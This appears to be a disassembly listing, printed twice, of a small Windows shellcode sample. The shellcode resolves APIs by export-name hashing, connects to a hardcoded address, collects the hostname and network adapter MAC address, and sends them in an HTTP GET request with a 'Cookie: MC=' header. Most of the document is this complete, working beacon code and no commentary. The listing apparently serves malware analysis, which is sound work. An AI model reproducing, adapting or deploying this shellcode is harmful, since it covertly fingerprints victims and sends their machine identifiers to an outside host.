Wack0/nit2016.asm

## nit2016.asm
; Input	MD5   :	614D07EF7777CFF5CFDF741587A097DA
; Input	CRC32 :	B326AB6B

; ---------------------------------------------------------------------------
; File Name   :	C:\Users\raylee\nit - Copy.bin
; Format      :	Binary file
; Base Address:	0000h Range: 0000h - 02FCh Loaded length: 02FCh

		.686p
		.mmx
		.model flat

; ===========================================================================

; Segment type:	Pure code
seg000		segment	byte public 'CODE' use32
		assume cs:seg000
		assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
		cld
		call	shellcode_main

; =============== S U B	R O U T	I N E =======================================


api_call	proc near

var_4		= dword	ptr -4

		pusha
		mov	ebp, esp
		xor	edx, edx
		mov	edx, fs:[edx+30h]
		mov	edx, [edx+0Ch]
		mov	edx, [edx+14h]

loc_15:					; CODE XREF: api_call+87j
		mov	esi, [edx+28h]
		movzx	ecx, word ptr [edx+26h]
		xor	edi, edi

loc_1E:					; CODE XREF: api_call+26j
		xor	eax, eax
		lodsb
		cmp	al, 61h	; 'a'
		jl	short loc_27
		sub	al, 20h	; ' '

loc_27:					; CODE XREF: api_call+1Dj
		ror	edi, 0Dh
		add	edi, eax
		loop	loc_1E
		push	edx
		push	edi
		mov	edx, [edx+10h]
		mov	eax, [edx+3Ch]
		add	eax, edx
		mov	eax, [eax+78h]
		test	eax, eax
		jz	short loc_89
		add	eax, edx
		push	eax
		mov	ecx, [eax+18h]
		mov	ebx, [eax+20h]
		add	ebx, edx

loc_4A:					; CODE XREF: api_call+60j
		jecxz	short loc_88
		dec	ecx
		mov	esi, [ebx+ecx*4]
		add	esi, edx
		xor	edi, edi

loc_54:					; CODE XREF: api_call+58j
		xor	eax, eax
		lodsb
		ror	edi, 0Dh
		add	edi, eax
		cmp	al, ah
		jnz	short loc_54
		add	edi, [ebp-8]
		cmp	edi, [ebp+24h]
		jnz	short loc_4A
		pop	eax
		mov	ebx, [eax+24h]
		add	ebx, edx
		mov	cx, [ebx+ecx*2]
		mov	ebx, [eax+1Ch]
		add	ebx, edx
		mov	eax, [ebx+ecx*4]
		add	eax, edx
		mov	[esp+28h+var_4], eax
		pop	ebx
		pop	ebx
		popa
		pop	ecx
		pop	edx
		push	ecx
		jmp	eax
; ---------------------------------------------------------------------------

loc_88:					; CODE XREF: api_call:loc_4Aj
		pop	eax

loc_89:					; CODE XREF: api_call+37j
		pop	edi
		pop	edx
		mov	edx, [edx]
		jmp	short loc_15
api_call	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn

shellcode_main	proc near		; CODE XREF: seg000:00000001p
		pop	ebp
		lea	eax, [ebp+297h]
		push	eax
		push	726774Ch
		call	ebp
		test	eax, eax
		jz	loc_22B
		lea	eax, [ebp+29Eh]
		push	eax
		push	726774Ch
		call	ebp
		test	eax, eax
		jz	loc_22B
		mov	ebx, 190h
		sub	esp, ebx
		push	esp
		push	ebx
		push	6B8029h
		call	ebp
		add	esp, ebx
		test	eax, eax
		jnz	loc_22B
		push	eax
		push	eax
		push	eax
		push	eax
		inc	eax
		push	eax
		inc	eax
		push	eax
		push	0E0DF0FEAh
		call	ebp
		xor	ebx, ebx
		not	ebx
		cmp	ebx, eax
		jz	loc_22B
		mov	ebx, eax

loc_F3:					; CODE XREF: shellcode_main+8Bj
		push	0E21B2705h
		push	small 5000h
		xor	ecx, ecx
		add	cl, 2
		push	cx
		mov	edx, esp
		push	10h
		push	edx
		push	ebx
		push	6174A599h
		call	ebp
		test	eax, eax
		jz	short loc_11C
		dec	byte ptr [ebp+248h]
		jnz	short loc_F3

loc_11C:				; CODE XREF: shellcode_main+83j
		mov	eax, 100h
		sub	esp, eax
		mov	edx, esp
		push	edx
		push	eax
		push	edx
		push	1DE49B6h
		call	ebp
		pop	edi
		add	esp, 100h
		test	eax, eax
		jnz	loc_234
		push	edi
		call	sub_23E
		pop	esi
		mov	edx, ecx
		lea	edi, [ebp+2A7h]
		call	sub_23E
		dec	edi
		cmp	edx, 20h ; ' '
		jl	short loc_15D
		mov	edx, 20h ; ' '

loc_15D:				; CODE XREF: shellcode_main+C7j
		mov	ecx, edx
		push	esi
		rep movsb
		mov	ecx, 0Dh
		lea	esi, [ebp+28Ah]
		rep movsb
		mov	[ebp+244h], edi
		pop	esi
		push	esi
		push	803428A9h
		call	ebp
		test	eax, eax
		jz	loc_234
		mov	cx, [eax+0Ah]
		cmp	cx, 4
		jb	loc_234
		lea	eax, [eax+0Ch]
		mov	eax, [eax]
		mov	ecx, [eax]
		mov	ecx, [ecx]
		mov	eax, 100h
		push	eax
		mov	edi, esp
		sub	esp, eax
		mov	esi, esp
		push	edi
		push	esi
		push	ecx
		push	ecx
		push	0B8D27248h
		call	ebp
		test	eax, eax
		add	esp, 104h
		movzx	ecx, word ptr [edi]
		cmp	ecx, 6
		jb	short loc_234
		mov	ecx, 6
		mov	eax, 10h
		sub	esp, eax
		mov	edi, esp
		mov	edx, ecx
		shl	edx, 1
		push	eax
		push	edx

loc_1D8:				; CODE XREF: shellcode_main+173j
		xor	edx, edx
		mov	dl, [esi]
		mov	al, dl
		and	al, 0F0h
		shr	al, 4
		cmp	al, 9
		ja	short loc_1EB
		add	al, 30h	; '0'
		jmp	short loc_1ED
; ---------------------------------------------------------------------------

loc_1EB:				; CODE XREF: shellcode_main+156j
		add	al, 37h	; '7'

loc_1ED:				; CODE XREF: shellcode_main+15Aj
		mov	[edi], al
		inc	edi
		mov	al, dl
		and	al, 0Fh
		cmp	al, 9
		ja	short loc_1FC
		add	al, 30h	; '0'
		jmp	short loc_1FE
; ---------------------------------------------------------------------------

loc_1FC:				; CODE XREF: shellcode_main+167j
		add	al, 37h	; '7'

loc_1FE:				; CODE XREF: shellcode_main+16Bj
		mov	[edi], al
		inc	edi
		inc	esi
		loop	loc_1D8
		pop	ecx
		sub	edi, ecx
		mov	esi, edi
		pop	eax
		add	esp, eax
		mov	edi, [ebp+244h]
		rep movsb
		call	sub_24F
		xor	eax, eax
		push	eax
		push	ecx
		sub	edi, ecx
		dec	edi
		push	edi
		push	ebx
		push	5F38EBC2h
		call	ebp
		jmp	short loc_234
; ---------------------------------------------------------------------------

loc_22B:				; CODE XREF: shellcode_main+11j
					; shellcode_main+27j ...
		push	0
		push	6F721347h
		call	ebp

loc_234:				; CODE XREF: shellcode_main+A9j
					; shellcode_main+F1j ...
		push	ebx
		push	614D6E75h
		call	ebp
		jmp	short loc_22B
shellcode_main	endp


; =============== S U B	R O U T	I N E =======================================


sub_23E		proc near		; CODE XREF: shellcode_main+B0p
					; shellcode_main+BEp ...
		xor	ecx, ecx
		not	ecx
		xor	eax, eax
		repne scasb
		not	ecx
		dec	ecx
		retn
sub_23E		endp

; ---------------------------------------------------------------------------
		align 4
		db 2 dup(0), 3

; =============== S U B	R O U T	I N E =======================================


sub_24F		proc near		; CODE XREF: shellcode_main+185p
		lea	edi, [ebp+2A7h]
		call	sub_23E
		dec	edi
		mov	ecx, 4Fh ; 'O'
		lea	esi, [ebp+26Eh]
		rep movsb
		lea	edi, [ebp+2A7h]
		call	sub_23E
		retn
sub_24F		endp

; ---------------------------------------------------------------------------
aAcceptEncoding	db 0Dh,0Ah
		db 'Accept-Encoding: gzip',0Dh,0Ah
		db 0Dh,0Ah,0
aCookieMcWs2_32	db 0Dh,0Ah
		db 'Cookie: MC='
aWs2_32		db 'ws2_32',0
aIphlpapi	db 'IPHLPAPI',0
aGet0a821a8005d	db 'GET /0a821a80/05dc0212 HTTP/1.1',0Dh,0Ah
		db 'Host: ',0
		align 4
		dd 8 dup(0)
		dd 41900000h
seg000		ends


		end
	; Input MD5 : 614D07EF7777CFF5CFDF741587A097DA
	; Input CRC32 : B326AB6B

	; ---------------------------------------------------------------------------
	; File Name : C:\Users\raylee\nit - Copy.bin
	; Format : Binary file
	; Base Address: 0000h Range: 0000h - 02FCh Loaded length: 02FCh

	.686p
	.mmx
	.model flat

	; ===========================================================================

	; Segment type: Pure code
	seg000 segment byte public 'CODE' use32
	assume cs:seg000
	assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
	cld
	call shellcode_main

	; =============== S U B R O U T I N E =======================================


	api_call proc near

	var_4 = dword ptr -4

	pusha
	mov ebp, esp
	xor edx, edx
	mov edx, fs:[edx+30h]
	mov edx, [edx+0Ch]
	mov edx, [edx+14h]

	loc_15: ; CODE XREF: api_call+87j
	mov esi, [edx+28h]
	movzx ecx, word ptr [edx+26h]
	xor edi, edi

	loc_1E: ; CODE XREF: api_call+26j
	xor eax, eax
	lodsb
	cmp al, 61h ; 'a'
	jl short loc_27
	sub al, 20h ; ' '

	loc_27: ; CODE XREF: api_call+1Dj
	ror edi, 0Dh
	add edi, eax
	loop loc_1E
	push edx
	push edi
	mov edx, [edx+10h]
	mov eax, [edx+3Ch]
	add eax, edx
	mov eax, [eax+78h]
	test eax, eax
	jz short loc_89
	add eax, edx
	push eax
	mov ecx, [eax+18h]
	mov ebx, [eax+20h]
	add ebx, edx

	loc_4A: ; CODE XREF: api_call+60j
	jecxz short loc_88
	dec ecx
	mov esi, [ebx+ecx*4]
	add esi, edx
	xor edi, edi

	loc_54: ; CODE XREF: api_call+58j
	xor eax, eax
	lodsb
	ror edi, 0Dh
	add edi, eax
	cmp al, ah
	jnz short loc_54
	add edi, [ebp-8]
	cmp edi, [ebp+24h]
	jnz short loc_4A
	pop eax
	mov ebx, [eax+24h]
	add ebx, edx
	mov cx, [ebx+ecx*2]
	mov ebx, [eax+1Ch]
	add ebx, edx
	mov eax, [ebx+ecx*4]
	add eax, edx
	mov [esp+28h+var_4], eax
	pop ebx
	pop ebx
	popa
	pop ecx
	pop edx
	push ecx
	jmp eax
	; ---------------------------------------------------------------------------

	loc_88: ; CODE XREF: api_call:loc_4Aj
	pop eax

	loc_89: ; CODE XREF: api_call+37j
	pop edi
	pop edx
	mov edx, [edx]
	jmp short loc_15
	api_call endp ; sp-analysis failed


	; =============== S U B R O U T I N E =======================================

	; Attributes: noreturn

	shellcode_main proc near ; CODE XREF: seg000:00000001p
	pop ebp
	lea eax, [ebp+297h]
	push eax
	push 726774Ch
	call ebp
	test eax, eax
	jz loc_22B
	lea eax, [ebp+29Eh]
	push eax
	push 726774Ch
	call ebp
	test eax, eax
	jz loc_22B
	mov ebx, 190h
	sub esp, ebx
	push esp
	push ebx
	push 6B8029h
	call ebp
	add esp, ebx
	test eax, eax
	jnz loc_22B
	push eax
	push eax
	push eax
	push eax
	inc eax
	push eax
	inc eax
	push eax
	push 0E0DF0FEAh
	call ebp
	xor ebx, ebx
	not ebx
	cmp ebx, eax
	jz loc_22B
	mov ebx, eax

	loc_F3: ; CODE XREF: shellcode_main+8Bj
	push 0E21B2705h
	push small 5000h
	xor ecx, ecx
	add cl, 2
	push cx
	mov edx, esp
	push 10h
	push edx
	push ebx
	push 6174A599h
	call ebp
	test eax, eax
	jz short loc_11C
	dec byte ptr [ebp+248h]
	jnz short loc_F3

	loc_11C: ; CODE XREF: shellcode_main+83j
	mov eax, 100h
	sub esp, eax
	mov edx, esp
	push edx
	push eax
	push edx
	push 1DE49B6h
	call ebp
	pop edi
	add esp, 100h
	test eax, eax
	jnz loc_234
	push edi
	call sub_23E
	pop esi
	mov edx, ecx
	lea edi, [ebp+2A7h]
	call sub_23E
	dec edi
	cmp edx, 20h ; ' '
	jl short loc_15D
	mov edx, 20h ; ' '

	loc_15D: ; CODE XREF: shellcode_main+C7j
	mov ecx, edx
	push esi
	rep movsb
	mov ecx, 0Dh
	lea esi, [ebp+28Ah]
	rep movsb
	mov [ebp+244h], edi
	pop esi
	push esi
	push 803428A9h
	call ebp
	test eax, eax
	jz loc_234
	mov cx, [eax+0Ah]
	cmp cx, 4
	jb loc_234
	lea eax, [eax+0Ch]
	mov eax, [eax]
	mov ecx, [eax]
	mov ecx, [ecx]
	mov eax, 100h
	push eax
	mov edi, esp
	sub esp, eax
	mov esi, esp
	push edi
	push esi
	push ecx
	push ecx
	push 0B8D27248h
	call ebp
	test eax, eax
	add esp, 104h
	movzx ecx, word ptr [edi]
	cmp ecx, 6
	jb short loc_234
	mov ecx, 6
	mov eax, 10h
	sub esp, eax
	mov edi, esp
	mov edx, ecx
	shl edx, 1
	push eax
	push edx

	loc_1D8: ; CODE XREF: shellcode_main+173j
	xor edx, edx
	mov dl, [esi]
	mov al, dl
	and al, 0F0h
	shr al, 4
	cmp al, 9
	ja short loc_1EB
	add al, 30h ; '0'
	jmp short loc_1ED
	; ---------------------------------------------------------------------------

	loc_1EB: ; CODE XREF: shellcode_main+156j
	add al, 37h ; '7'

	loc_1ED: ; CODE XREF: shellcode_main+15Aj
	mov [edi], al
	inc edi
	mov al, dl
	and al, 0Fh
	cmp al, 9
	ja short loc_1FC
	add al, 30h ; '0'
	jmp short loc_1FE
	; ---------------------------------------------------------------------------

	loc_1FC: ; CODE XREF: shellcode_main+167j
	add al, 37h ; '7'

	loc_1FE: ; CODE XREF: shellcode_main+16Bj
	mov [edi], al
	inc edi
	inc esi
	loop loc_1D8
	pop ecx
	sub edi, ecx
	mov esi, edi
	pop eax
	add esp, eax
	mov edi, [ebp+244h]
	rep movsb
	call sub_24F
	xor eax, eax
	push eax
	push ecx
	sub edi, ecx
	dec edi
	push edi
	push ebx
	push 5F38EBC2h
	call ebp
	jmp short loc_234
	; ---------------------------------------------------------------------------

	loc_22B: ; CODE XREF: shellcode_main+11j
	; shellcode_main+27j ...
	push 0
	push 6F721347h
	call ebp

	loc_234: ; CODE XREF: shellcode_main+A9j
	; shellcode_main+F1j ...
	push ebx
	push 614D6E75h
	call ebp
	jmp short loc_22B
	shellcode_main endp


	; =============== S U B R O U T I N E =======================================


	sub_23E proc near ; CODE XREF: shellcode_main+B0p
	; shellcode_main+BEp ...
	xor ecx, ecx
	not ecx
	xor eax, eax
	repne scasb
	not ecx
	dec ecx
	retn
	sub_23E endp

	; ---------------------------------------------------------------------------
	align 4
	db 2 dup(0), 3

	; =============== S U B R O U T I N E =======================================


	sub_24F proc near ; CODE XREF: shellcode_main+185p
	lea edi, [ebp+2A7h]
	call sub_23E
	dec edi
	mov ecx, 4Fh ; 'O'
	lea esi, [ebp+26Eh]
	rep movsb
	lea edi, [ebp+2A7h]
	call sub_23E
	retn
	sub_24F endp

	; ---------------------------------------------------------------------------
	aAcceptEncoding db 0Dh,0Ah
	db 'Accept-Encoding: gzip',0Dh,0Ah
	db 0Dh,0Ah,0
	aCookieMcWs2_32 db 0Dh,0Ah
	db 'Cookie: MC='
	aWs2_32 db 'ws2_32',0
	aIphlpapi db 'IPHLPAPI',0
	aGet0a821a8005d db 'GET /0a821a80/05dc0212 HTTP/1.1',0Dh,0Ah
	db 'Host: ',0
	align 4
	dd 8 dup(0)
	dd 41900000h
	seg000 ends


	end